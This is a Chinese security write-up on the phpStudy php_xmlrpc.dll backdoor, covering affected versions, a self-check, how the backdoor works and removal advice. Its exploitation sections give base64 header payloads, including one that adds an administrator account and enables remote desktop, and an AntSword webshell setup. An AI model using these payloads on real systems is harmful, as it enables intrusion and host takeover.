phpStudy 隐藏后门

1. Phpstudy

Phpstudy是一款PHP调试环境的程序集成包，集成了最新的Apache、PHP、phpMyAdmin、ZendOptimizer等多款软件一次性安装，无需配置，即装即用。由于其免费且方便的特性，在国内有着近百万的PHP语言学习者、开发者用户。

2. 受影响版本及组件

phpStudy_2016.11.03

phpphp-5.2.17extphp_xmlrpc.dll

phpphp-5.4.45extphp_xmlrpc.dll

phpStudy_2018.02.11

PHPTutorialphpphp-5.2.17extphp_xmlrpc.dll

PHPTutorialphpphp-5.4.45extphp_xmlrpc.dll

3. 环境搭建

1. Phpstudy 下载 http://www.downza.cn/soft/275049.html

2. 安装phpstudy，并更换至存在问题版本。

4. 自查方法

根据安装目录查找到可能存在问题的 php_xmlrpc.dll 组件，查找文件中是否包含关键字 @eval(%s('%s')) 。包含该关键字则存在后门漏洞。

5. 漏洞原理

后门类型：C&C、命令执行

@是PHP提供的错误信息屏蔽专用符号。

Eval()可执行php代码，中间%s格式符为字符串传参。

6 验证方法

6.1 使用burpsuit

GET /index.php HTTP/1.1

Host: ip.ip.ip.ip

…..

Accept-Encoding: gzip,deflate

Accept-Charset:cGhwaW5mbygpOw==

//此处放置执行命令的base64编码：phpinfo();

….

6.2 使用python脚本

6.2.1批量处理poc

脚本见附录8.1

6.2.2 ROC脚本

7. 漏洞提权

7.1 使用工具：中国蚁剑

下载地址：https://github.com/AntSwordProject/AntSword-Loader

1. 打开中国蚁剑，右键添加数据

2. 配置参数

ZXZhbCgkX1BPU1RbbGV0bWVpbl0pOwo=eval($_POST[letmein]);的base64编码。Letmein为连接密码。

3. 测试连接

7.2 使用burpsuit 创建用户

GET /index.php HTTP/1.1

Host: ip.ip.ip.ip

…..

Accept-Encoding: gzip,deflate

Accept-Charset:  c3lzdGVtICgnbmV0IHVzZXIgdGVzdCB0ZXN0IC9hZGQnKTsKc3lzdGVtICgnbmV0IGxvY2FsZ3JvdXAgYWRtaW5pc3RyYXRvcnMgdGVzdCAvYWRkJyk7CnN5c3RlbSAoJ1JFRyBBREQgSEtMTVxTWVNURU1cQ3VycmVudENvbnRyb2xTZXRcQ29udHJvbFxUZXJtaW5hbCIgIlNlcnZlciAvdiBmRGVueVRTQ29ubmVjdGlvbnMgL3QgUkVHX0RXT1JEIC9kIDAwMDAwMDAwIC9mJyk7

//创建test/test用户；添加管理员权限；开启3389远程桌面

//一条龙服务

//可使用rdp客户端连接靶机test/test用户

8. 整改建议

1. 删除问题版本phpstudy

植入后门版本分别为phpStudy_2016.11.03、phpStudy_2018.02.11，如果是通过其它非官方下载站下载的该版本，请自行使用以上方法检查并删除其中的存在问题的版本。

2. 在官方网站下载phpstudy

目前PhpStudy官方已发布最新版本PhpStudy v8.0，请访问官方链接更新到最新软件：https://www.xp.cn/

原文始发于微信公众号（CTS纵横安全实验室）：phpStudy 隐藏后门